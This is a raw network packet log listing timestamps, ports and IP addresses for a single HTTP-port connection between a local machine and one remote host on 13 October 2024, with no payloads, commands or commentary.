Oct 13, 2024 17:46:20.088212967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.088745117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.088759899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.088771105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.088845015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.088845015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.092170000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.092184067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.092195034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.092288017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.092288017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.093456030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.093470097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.093528986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.093528986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.096873999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.096895933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.096906900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.096951962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.097346067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.098165989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.098179102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.098190069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.098572016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.101639986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.101775885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.102911949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.102930069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.102940083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.102952957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.102968931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.103063107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.103063107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.106570959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.106939077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.107655048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.107671022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.107784986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.107824087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.107837915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.107959986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.112116098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.112343073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.112601042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.112616062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.112624884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.112637043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.112663031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.112895012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.117074966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.117089987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.117197037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.117302895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.117315054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.117326021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.117336988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.117358923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.117358923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.117800951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.122068882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.122178078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.122190952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.122219086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.122263908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.122268915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.122526884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.127288103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.127300978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.127315044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.127326965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.127402067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.127402067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.127592087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.127605915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.127662897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.127662897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.132049084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.132062912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.132072926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.132260084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.132323980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.132337093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.132420063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.132432938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.136889935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.136903048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.136912107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.136991024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.136991024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.137073994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.137087107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.137129068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.137129068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.141669989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.141684055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.141695023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.141824007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.141835928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.141845942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.141870022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.141870022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.141985893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.146434069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.146446943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.146528006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.146542072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.146616936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.146616936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.151281118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.151293993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.151307106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.151324987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.151339054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.151431084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.151431084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.156069040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.156083107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.156091928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.156099081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.156110048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.156198978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.156198978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.160881996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.160896063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.160907030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.160921097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.160979033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.160979033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.165981054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.165993929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166004896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166017056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166028023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166045904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166057110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166068077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166079998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166090012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166095972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166096926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166096926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166107893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166120052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166130066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166141033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166150093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166156054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166162014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166182995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166193962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166194916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166194916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166205883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166217089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166228056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166237116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166239023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166250944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166260004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166270971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166276932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166276932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166282892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166290045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166295052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166305065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166323900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166336060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166337013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166346073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166347027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166347027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166363955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166376114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166385889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166394949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166397095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166409016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166409969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166419983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166429043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166434050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166446924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166462898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166474104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166480064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166486025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166498899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166507006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166507006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166508913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166521072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166531086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166539907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166543007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166554928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166559935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166559935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166568041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166578054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166588068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166598082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166609049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166615963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166615963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166627884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166635990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166642904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166652918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166654110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166666985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166676998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166682959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166682959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166690111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166702032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166707993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166711092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166717052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166728020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166738987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166738987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166749954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166762114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166770935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166771889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166785002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166794062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166800022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166800022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166805029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166817904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166827917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166838884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166848898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166857004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166857004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166857004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166858912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166870117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166881084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166891098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166899920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166903973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166915894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166923046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166927099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166938066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166944981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166945934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.166951895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166965008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166975975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166985989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.166996956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167000055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167000055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167009115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167021036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167021990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167032003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167045116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167046070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167063951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167072058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167074919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167085886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167097092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167103052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167108059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167120934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167129993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167129993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167131901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167145014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167155027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167160988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167166948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167179108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167188883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167195082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167200089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167210102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167212009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167212009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167227983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167238951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167243004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167243004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167251110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167262077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167272091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167284012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167288065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167294979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167304039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167306900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167319059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167329073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167332888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167341948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167351961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167362928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167367935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167367935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167375088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.167423010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.167423010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.225737095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.225763083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.225773096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.225843906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.225852966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.225853920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.225852966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.225868940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.225881100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.225893974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.225909948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.225944996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.225945950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.225961924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.225970984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.225975990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.225986958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.225997925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226015091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226026058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226035118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.226036072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226035118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.226053953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226067066 CEST	80	49730	185.215.113.37	192.168.2.4
